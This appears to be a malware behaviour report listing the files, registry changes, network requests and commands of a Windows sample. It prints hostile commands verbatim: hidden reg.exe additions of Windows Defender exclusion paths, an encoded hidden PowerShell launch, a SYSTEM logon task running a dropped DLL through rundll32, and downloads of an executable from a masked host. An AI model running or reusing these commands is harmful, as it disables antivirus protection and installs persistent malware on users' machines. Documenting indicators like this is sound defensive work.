Technical Information
- <SYSTEM32>\tasks\gtfsfhcqj
- %WINDIR%\tasks\ujhmonstclyycio.job
- <SYSTEM32>\tasks\ujhmonstclyycio
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\CPOUVNWwAlPNXmGNYVR' = '0'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\YOKCRooXUQUn' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\YOKCRooXUQUn' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\eLHRvYnKU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\eLHRvYnKU' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\eLHRvYnKU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\rIROZNTZtIE' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\OVKWEdVsAAABC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\YOKCRooXUQUn' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\rIROZNTZtIE' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\MRHNKwesdEXHCyVB' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\MRHNKwesdEXHCyVB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\aHoJjyKHbVxBZ' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\aHoJjyKHbVxBZ' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\aHoJjyKHbVxBZ' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\qvxGpVePcmOpJPRXI' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\rIROZNTZtIE' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\MRHNKwesdEXHCyVB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\OVKWEdVsAAABC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\OVKWEdVsAAABC' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\NiMTTuEjhYQU2' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\OVKWEdVsAAABC' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\YOKCRooXUQUn' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\eLHRvYnKU' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\rIROZNTZtIE' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\MRHNKwesdEXHCyVB' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\aHoJjyKHbVxBZ' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\qvxGpVePcmOpJPRXI' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\NiMTTuEjhYQU2' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\rLPziquDsnBPLsNr' = '0'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\rLPziquDsnBPLsNr' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\rLPziquDsnBPLsNr' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\CPOUVNWwAlPNXmGNYVR' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\CPOUVNWwAlPNXmGNYVR' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\CPOUVNWwAlPNXmGNYVR' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\NiMTTuEjhYQU2' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\NiMTTuEjhYQU2' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\rLPziquDsnBPLsNr' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\qvxGpVePcmOpJPRXI' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\qvxGpVePcmOpJPRXI' = '00000000'
- '%WINDIR%\temp\kxnybvxkxlhrayak\pzxmeunie.exe' /S /UPDATE
- %WINDIR%\temp\kxnybvxkxlhrayak\pzxmeunie.exe
- %WINDIR%\temp\rlpziqudsnbplsnr\oanliedp\asuaupsidroppgbu.wsf
- %ProgramFiles(x86)%\elhrvynku\ficzdt.dll
- <SYSTEM32>\tasks\gtfsfhcqj
- %WINDIR%\temp\rlpziqudsnbplsnr\oanliedp\asuaupsidroppgbu.wsf
- %PROGRAMDATA%\ntuser.pol
- %HOMEPATH%\ntuser.pol
- http://ra#####lestorage.com/updates/ts/ts_18/update.txt
- http://ra#####lestorage.com/updates/ts/ts_18/update_e.exe
- DNS ASK ra#####lestorage.com
- DNS ASK clients2.google.com
- '%WINDIR%\syswow64\wscript.exe' "%WINDIR%\Temp\rLPziquDsnBPLsNr\oANLiEDp\ASuAuPSIDroPPGbU.wsf"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\rIROZNTZtIE" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\rIROZNTZtIE" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\rIROZNTZtIE" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\MRHNKwesdEXHCyVB" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\MRHNKwesdEXHCyVB" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\MRHNKwesdEXHCyVB" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\MRHNKwesdEXHCyVB" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\rIROZNTZtIE" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\eLHRvYnKU" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\aHoJjyKHbVxBZ" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\aHoJjyKHbVxBZ" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\qvxGpVePcmOpJPRXI" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\qvxGpVePcmOpJPRXI" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\qvxGpVePcmOpJPRXI" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\qvxGpVePcmOpJPRXI" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\rLPziquDsnBPLsNr" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\rLPziquDsnBPLsNr" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\aHoJjyKHbVxBZ" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\aHoJjyKHbVxBZ" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\eLHRvYnKU" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\NiMTTuEjhYQU2" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '<SYSTEM32>\gpupdate.exe' /force' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\CPOUVNWwAlPNXmGNYVR" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\CPOUVNWwAlPNXmGNYVR" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\CPOUVNWwAlPNXmGNYVR" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\CPOUVNWwAlPNXmGNYVR" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\NiMTTuEjhYQU2" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\NiMTTuEjhYQU2" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\NiMTTuEjhYQU2" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\OVKWEdVsAAABC" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\eLHRvYnKU" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\OVKWEdVsAAABC" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\OVKWEdVsAAABC" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\OVKWEdVsAAABC" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\YOKCRooXUQUn" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\YOKCRooXUQUn" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\YOKCRooXUQUn" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\YOKCRooXUQUn" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\eLHRvYnKU" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\rLPziquDsnBPLsNr" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\rLPziquDsnBPLsNr" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "gtFSFHCqj" /SC once /ST 03:49:37 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZ...
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "CQPzRGRCmqqyukzTZ"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "CQPzRGRCmqqyukzTZ"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "oGuWOOHAMXRkNQzYp2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "oGuWOOHAMXRkNQzYp2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "oGuWOOHAMXRkNQzYp"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "oGuWOOHAMXRkNQzYp"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\qvxGpVePcmOpJPRXI" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\MRHNKwesdEXHCyVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\qvxGpVePcmOpJPRXI" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\qvxGpVePcmOpJPRXI" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\aHoJjyKHbVxBZ" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\aHoJjyKHbVxBZ" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\aHoJjyKHbVxBZ" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\aHoJjyKHbVxBZ" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\MRHNKwesdEXHCyVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\MRHNKwesdEXHCyVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\qvxGpVePcmOpJPRXI" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\MRHNKwesdEXHCyVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "CQPzRGRCmqqyukzTZ2"
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TR "rundll32 \"%ProgramFiles(x86)%\eLHRvYnKU\FIczDT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "UJhMONSTclYyCIo" /V1 /F
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "wRWzFVFCbarZy"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "wRWzFVFCbarZy"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "UptZqpKOGRwPFv"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "UptZqpKOGRwPFv"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "YRKFcFnVGMhCOGB2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "YRKFcFnVGMhCOGB2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "YRKFcFnVGMhCOGB"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "LHQqcxkZdNDYStLjawT"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "CQPzRGRCmqqyukzTZ2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "IKrzQwBTrnUIEWAXPvR2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "IKrzQwBTrnUIEWAXPvR2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "IKrzQwBTrnUIEWAXPvR"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "IKrzQwBTrnUIEWAXPvR"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "LHQqcxkZdNDYStLjawT2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "LHQqcxkZdNDYStLjawT2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "LHQqcxkZdNDYStLjawT"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "YRKFcFnVGMhCOGB"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\rIROZNTZtIE" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\rIROZNTZtIE" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\rIROZNTZtIE" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C copy nul "%WINDIR%\Temp\rLPziquDsnBPLsNr\oANLiEDp\ASuAuPSIDroPPGbU.wsf"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\rLPziquDsnBPLsNr" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\rLPziquDsnBPLsNr" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\rLPziquDsnBPLsNr" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\rLPziquDsnBPLsNr" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\rLPziquDsnBPLsNr" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\CPOUVNWwAlPNXmGNYVR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\rLPziquDsnBPLsNr" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\rLPziquDsnBPLsNr" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gtFSFHCqj"
- '<SYSTEM32>\gpscript.exe' /RefreshSystemParam
- '<SYSTEM32>\gpupdate.exe' /force
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
- '<SYSTEM32>\taskeng.exe' {967EE6BB-5DEE-49B6-8836-BDDA72BBAAEE} S-1-5-21-1960123792-2022915161-3775307078-1001:ghigfdqks\user:Interactive:[1]
- '%WINDIR%\syswow64\schtasks.exe' /run /I /tn "gtFSFHCqj"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\rLPziquDsnBPLsNr" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\CPOUVNWwAlPNXmGNYVR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\CPOUVNWwAlPNXmGNYVR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\CPOUVNWwAlPNXmGNYVR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\rIROZNTZtIE" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\YOKCRooXUQUn" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\eLHRvYnKU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\eLHRvYnKU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\eLHRvYnKU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\eLHRvYnKU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\YOKCRooXUQUn" /t REG_DWORD /d 0 /reg:64
